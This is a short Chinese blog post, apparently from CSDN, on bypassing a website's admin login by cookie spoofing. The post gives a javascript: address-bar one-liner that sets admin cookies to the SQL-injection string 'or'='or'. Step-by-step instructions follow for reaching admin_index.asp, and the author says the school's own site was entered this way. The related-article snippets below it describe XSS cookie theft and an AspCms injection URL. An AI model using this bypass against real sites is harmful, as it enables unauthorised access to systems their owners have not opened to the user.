cookie欺骗登录网站后台

最新推荐文章于 2022-02-25 10:56:28 发布
最新推荐文章于 2022-02-25 10:56:28 发布 · 1.9k 阅读 · 4
文章标签:

#javascript #ViewUI

本文介绍了一种通过修改浏览器中的cookie来实现对网站后台管理系统的未授权访问的方法。该方法适用于存在特定漏洞的网站,通过在浏览器地址栏输入特定的JavaScript代码来修改cookie,从而绕过登录验证。 
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert (document.cookie="adminpass="+escape("'or'='or'"));javascript:alert (document.cookie="admindj="+escape("1"));

知识的海洋真是无穷尽的,关键是找到适合自己的位置,并努力做好它。

今天听同学说可以采用cookie欺骗方式登录网站的后台管理系统,具有此漏洞的网站可以采用这个方式进入,学校的的网站证实也存在此漏洞。记录如下:

方法如下,1,打开后台管理页面。

2,将上述javascript代码输入到浏览器地址栏中。

3,在域名后面输入admin_index.asp页面,成功进入。


iteye_19603
关注
App后台开发运维和架构实践学习总结(11)——Cookie、Session、Token那点事儿
科技D人生
05-07 5213
前言:新公司项目中使用到了Cookie,在各大Android技术讨论群向前辈们取经讨论这cookie、session、token这仨哥们的时候,很多开发者说法不一各抒已见,所以是时候回顾下http基础以及总结开发经验了。本文重在科普分析Cookie、Session、Token的基本概念和应用场景;Okhttp框架下对Cookie的管理使用。文章如果写的不好请各位开发者老司机私聊或者在评论区指点提出...
【猫客工作室】xss跨站进行cookies欺骗后台
01-12
【猫客工作室】xss跨站进行cookies欺骗后台
通过COOKIE欺骗登录网站后台
weixin_30908941的博客
03-09 1645
1.今天闲着没事看了看关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利...
cookie欺骗
FreeXploiT
10-25 2183
现在有很多社区网为了方便网友浏览,都使用了cookie技术以避免多次输入密码(就如the9 和vr),所以只要对服务器递交给用户的cookie进行改写就可以达到欺骗服务程序的目的。 COOKIE欺骗原理 按照浏览器的约定,只有来自同一域名的cookie才可以读写,而cookie只是浏览器的,对通 讯协议无影响,所以要进行cookie欺骗可以有多种途径: 1、跳过浏览器,直接对通讯数据改写 2、修改
cookie欺骗
paradise3011的博客
09-18 8956
cookie欺骗是用户在登录的时候极为容易被他人获取权限,植入浏览器中,从而访问到后台。 先简要认识一下cookiecookie机制是在浏览网页的时候,服务器将你的登录信息,浏览信息等发送给客户端并保存一定的时间。当你下一次访问这个网站的时候,就能读取上一次你的记录。 例如自动登录等。很多的网站都是由cookie来辨认登录者的信息。它可以起到登录验证的作用,从而存在了漏洞,可以绕过验证直接登录...
COOKIE伪造登录网站后台
weixin_30312659的博客
01-16 3055
1.关于XSS(跨站脚本攻击)和CSRF(跨站请求伪造)的知识,xss表示Cross Site Scripting(跨站脚本攻击),它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实现对用户游览器的控制,CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XS...
网站cookie欺骗
04-27
网站渗透,cookie欺骗后台管理员账户和密码
提升Web安全:防范Cookie欺骗与常见漏洞策略
在Web编程中,Cookie欺骗是一种常见的安全漏洞,主要涉及通过伪造或篡改用户的Cookie数据来获取未授权的访问权限或者执行恶意操作。Cookie通常用于存储用户状态信息,如会话ID,以便服务器识别并跟踪用户。然而,...
aspcms cookies欺骗后台无验证注入
qq_38807738的博客
06-23 3321
后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!————————后台注射———————— http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname...
cookie 修改欺骗必备工具
12-29
cookie 修改欺骗必备工具 网络安全必备工具
cookie欺骗详解与防御技术
02-16
基于cookies的攻击与防御技术,讲述cookies攻击原理,攻击案例,以及防御技术
通过cookie进行网站后台
zhaozhanyong的专栏
07-13 2692
1、打开后台URL,点firefox浏览器的firebug,选择下图中的Cookies,根据cookie新建三项cookie login_type pavoid,把内容分别进去,一刷新就可以了
cookie欺骗初探
pairsfish的专栏(你知道东方在哪一边)
06-29 1724
先普及一下基础知识 cookie欺骗      :就是利用cookie欺骗,攻击过程中对于cookie的利用在于,cookie注入和cookie欺骗。 其它方法          :其他比较常用的还有xss,sql注入,旁注,什么的,这些先不提,多说一下这个跨站攻击其实叫做css,cross-site啥的,不过css这个简称已经被占用了,所以只能叫做xss了。         cookie
HTTP协议分析——Cookie欺骗
携秋水揽星河的博客
06-19 821
网站登录——身份认证 一个页面能否被访问,判断依据是通过存储信息区域中用户的信息来判断的 登录页面的作用就是 验证用户输入的用户名+密码的组合是否在数据库中存在。若存在则将信息保存在存储信息的区域,以方便各个页面去判断权限 Cookie漏洞——泄漏 由于采用的是http传输,可以通过获取客户端发送给服务端的cookie请求来获取相关的信息,再将cookie请求发送给服务端。 cookie...
解析cookie欺骗实现过程及具体应用
李宁的专栏(Neal Lee)
10-09 937
正如我们所知道的,在网络词汇中,cookie是一个特殊的信息,虽然只是服务器存于用户计算机上的一个文本文件,但由于其内容的不寻常性(与服务器有一定的互交性,且常会存储用户名,甚至口令,或是其它一些敏感信息,例如在江湖或是一些社区中,常会用cookie来保存用户集分,等级等等)。因而成为一些高手关注的对像,借此来取得特殊权限,甚至攻克整个网站。本人出些拙作,以java script中对cookie
利用cookie进行自动登录
u012045045的博客
04-18 379
<%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="UTF-8" session="false"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://
xss平台打cookie登录后台(保姆级教程)
orange777
02-25 4987
前言 最新看了一篇hack学习呀【记一次帮助粉丝渗透黑入杀猪盘诈骗的实战】的文章,有个xss的地方自己有点疑问就自己搭平台复现了一下 phpstudy环境复现 找一个xss平台,如 http://xsscom.com/ 随便新建一个项目111,复制下面的代码到存在xss的地方即可 直接找个反射型xss试一下(这里在虚机登录) 这里xss平台获取到用户登录情况 用这个获取到的cookie登录一下后台(在物理机试下) 这里说一下,为了方便可以下载一个修改cookie的插件,如google浏览器的EditT
【Web安全】利用burp抓包和CSRF伪造进入admin真实后台
NJU phd 在读。
03-21 1860
文章目录1 CSRF2 HTTP头部之host和referer2.1 host2.2 referer3 开始抓包3.1 先一直测试到最后观察3.2 修改referer或host,开始渗透 1 CSRF CSRF(Cross Site Request Forgery) 跨站请求伪造。也被称为One Click Attack和Session Riding,通常缩写为CSRF或XSRF。如果从名字你还不...
ShopEx后台认证去除补丁及登录优化方案
在 ShopEx 的发展过程中,其后台管理系统逐步增强了安全控制机制,其中“后台登录必须认证”功能是一项重要的安全增强措施,旨在防止未经授权的用户访问后台管理系统,从而保障网站数据的安全性和完整性。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值